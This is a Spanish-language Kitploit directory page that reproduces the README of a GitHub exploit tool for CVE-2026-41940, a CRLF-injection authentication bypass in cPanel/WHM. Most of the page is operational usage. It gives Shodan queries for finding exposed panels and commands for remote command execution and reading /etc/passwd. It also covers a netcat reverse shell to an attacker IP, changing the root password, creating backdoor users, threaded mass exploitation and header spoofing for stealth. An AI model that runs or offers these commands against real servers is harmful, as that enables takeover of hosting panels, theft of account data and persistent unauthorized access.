Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-41940-PoC-Exploit — 🚀 CVE-2026-41940 Exploit de Bypass de Autenticación de cPanel/WHM - Mejor Flujo 💥 La inyección CRLF provoca bypass de autenticación, secuestro de sesión y fuga de cuentas. ✅ Proxy, UA personalizado, keep-alive, reintentos, verificación SSL, salida con colores, soporte de guardado en archivo. ⚡ PoC avanzado para pentesters. | Kitploit
Herramientas/GitHubGitHub/tc4dy/cve-2026-41940-poc-exploit
Autenticación y AutorizaciónEscalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPost-ExplotaciónPruebas de PenetraciónComando y Control

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Red Teaming
Desarrollo de Payloads
GitHubtc4dy/cve-2026-41940-poc-exploit

CVE-2026-41940-PoC-Exploit

Ver Repositorio
928hace 1 mesAún no revisado

Acerca de

🚀 CVE-2026-41940 Exploit de Bypass de Autenticación de cPanel/WHM - Mejor Flujo 💥 La inyección CRLF provoca bypass de autenticación, secuestro de sesión y fuga de cuentas. ✅ Proxy, UA personalizado, keep-alive, reintentos, verificación SSL, salida con colores, soporte de guardado en archivo. ⚡ PoC avanzado para pentesters.

Compartir

CVE-2026-41940

🚀 CVE-2026-41940 - Exploit de Bypass de Autenticación en cPanel/WHM

Python License CVSS Pentesting

Edición cPanel & WHM - Inyección CRLF para Bypass de Autenticación y Secuestro Total de Sesión

📌 Descripción general

Este exploit aprovecha CVE-2026-41940, una vulnerabilidad crítica de bypass de autenticación en cPanel/WHM. Al inyectar una carga útil CRLF manipulada en el sistema de gestión de sesiones, logra el secuestro de sesión, acceso root y control total sobre el panel de hosting sin necesidad de credenciales válidas.

🔥 Características principales

🎯 Versiones vulnerables

📍 Búsqueda en Shodan

root@kitploit:~
port:2087 "cPanel" "WHM"
port:2083 "cPanel"

⚠️ Aviso legal: Esta herramienta es solo para pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado es ilegal.

📦 Instalación

root@kitploit:~
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-41940-POC-Exploit
cd CVE-2026-41940-POC-Exploit

# Install dependencies
pip3 install -r requirements.txt

# Run
python3 exploit.py -t https://example.com:2087

🛠️ Ejemplos de uso

root@kitploit:~
# Basic exploitation (extract accounts)
python3 exploit.py -t https://192.168.1.100:2087

# Save accounts to file
python3 exploit.py -t https://192.168.1.100:2087 -o accounts.txt

# Verbose mode (debug output)
python3 exploit.py -t https://192.168.1.100:2087 -v

# Interactive WHM Shell (Recommended)
python3 exploit.py -t https://192.168.1.100:2087 -i

💻 Comandos de la shell interactiva

root@kitploit:~
[email protected] $ accounts          # List all cPanel accounts
[email protected] $ version           # Show cPanel version
[email protected] $ ls /home          # List directory
[email protected] $ cat /etc/passwd   # Read file
[email protected] $ exec id           # Execute command
[email protected] $ passwd NewPass123 # Change root password
[email protected] $ adduser test test.com pass123  # Create new user
[email protected] $ exit              # Exit shell

## 🔧 Ejecución remota de comandos

```bash
# Execute single command
python3 exploit.py -t https://192.168.1.100:2087 --cmd "id"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "cat /etc/passwd"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "whoami; hostname; uname -a"


# Read file
python3 exploit.py -t https://192.168.1.100:2087 --read /etc/passwd
python3 exploit.py -t https://192.168.1.100:2087 --read /home/example/config.php

🌐 Shell inversa

root@kitploit:~
# Attacker machine (listener)
nc -lvnp 4444

# Exploit (reverse shell)
python3 exploit.py -t https://192.168.1.100:2087 --reverse-shell 10.0.0.1:4444

🔐 Operaciones de post-explotación

root@kitploit:~
# Change root password
python3 exploit.py -t https://192.168.1.100:2087 --passwd "NewRootPass123!"

# Create new cPanel user
python3 exploit.py -t https://192.168.1.100:2087 --adduser hacker hacker.com Pass1234

# Keep-alive session (maintain access)
python3 exploit.py -t https://192.168.1.100:2087 --no-keep-alive  # Disable auto keep-alive

📊 Explotación masiva (múltiples objetivos)

root@kitploit:~
# Create targets file
echo "https://target1.com:2087" > targets.txt
echo "https://target2.com:2087" >> targets.txt
echo "https://10.0.0.5:2087" >> targets.txt

# Mass exploit with 20 threads
python3 exploit.py -l targets.txt --threads 20

# Mass exploit with command execution
python3 exploit.py -l targets.txt --threads 10 --cmd "id"

⚙️ Opciones avanzadas

root@kitploit:~
# Custom port (non-standard)
python3 exploit.py -t https://example.com -p 8443

# Using proxy
python3 exploit.py -t https://192.168.1.100:2087 --proxy http://127.0.0.1:8080

# Custom user-agent for stealth
python3 exploit.py -t https://192.168.1.100:2087 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Custom delay and retries
python3 exploit.py -t https://192.168.1.100:2087 --delay 5 --max-retries 5

# SSL verification (ignore self-signed by default)
python3 exploit.py -t https://192.168.1.100:2087 --ssl-verify

📊 Argumentos de línea de comandos

🧪 Entorno de pruebas

Docker (si quieres probar de forma segura)

docker run -d --name cpanel-test -p 2087:2087 cpanel/cpanel:102

O con la versión vulnerable

docker pull cpanel/cpanel:11.102 docker run -d -p 2087:2087 cpanel/cpanel:11.102

🔗 Exploits relacionados

Echa un vistazo a mis otros repositorios de exploits:

  • CVE-2026-24061
  • CVE-2026-0073
  • CVE-2026-29000
Descargar herramienta
CategoríaCaracterísticas
Explotación✅ Bypass de autenticación mediante inyección CRLF
✅ Secuestro de sesión de WHM
✅ Fuga de tokens de seguridad
✅ Acceso root instantáneo
Post-explotación✅ Extracción de lista de cuentas (usuario + dominio)
✅ Ejecución remota de comandos (RCE)
✅ Shell inversa (compatible con netcat)
✅ Lectura de archivos (configuraciones, registros, etc.)
✅ Cambio de contraseña de root
✅ Creación de nuevos usuarios de cPanel
Escaneo✅ Explotación de un solo objetivo
✅ Escaneo masivo de múltiples objetivos
✅ Multihilo (hilos configurables)
✅ Soporte para sobrescribir puerto
Sigilo✅ Retardos aleatorios entre peticiones
✅ Suplantación de X-Forwarded-For
✅ Soporte de User-Agent personalizado
✅ Soporte de proxy (HTTP/HTTPS)
Usabilidad✅ Shell interactiva de WHM (-i)
✅ Salida con colores (colorama)
✅ Modo verboso/depuración
✅ Exportación de lista de cuentas a archivo
✅ Hilo de sesión keep-alive
✅ Mecanismo de reintentos para conexiones inestables
ProductoVersionesEstado
cPanel & WHM11.92 - 11.102✅ Confirmado
cPanel & WHM11.104 - 11.110✅ Confirmado
cPanel & WHM11.118 - 11.136⚠️ Limitado
cPanel & WHM< 11.86✅ Posiblemente vulnerable
CortoLargoDescripciónPredeterminado
-t--targetURL de un solo objetivoRequerido (individual)
-l--target-fileArchivo con la lista de objetivosRequerido (masivo)
-p--portSobrescribir puertoDetección automática
-o--outputGuardar lista de cuentas en un archivoNinguno
-v--verboseHabilitar salida de depuraciónFalso
-i--interactiveShell interactiva de WHMFalso
--proxyProxy HTTP/HTTPSNinguno
-ua--user-agentUser-Agent personalizadoAleatorio
--cmdEjecutar un solo comandoNinguno
--reverse-shellShell inversa IP:PUERTONinguno
--passwdCambiar contraseña de rootNinguno
--adduserCrear nuevo usuario (USUARIO DOMINIO CONTRASEÑA)Ninguno
--readLeer archivo del objetivoNinguno
--threadsHilos para escaneo masivo10
--delayIntervalo de keep-alive (segundos)3.0
--max-retriesReintentos máximos por petición3
--no-keep-aliveNo mantener la sesiónFalso
--ssl-verifyVerificar certificados SSLFalso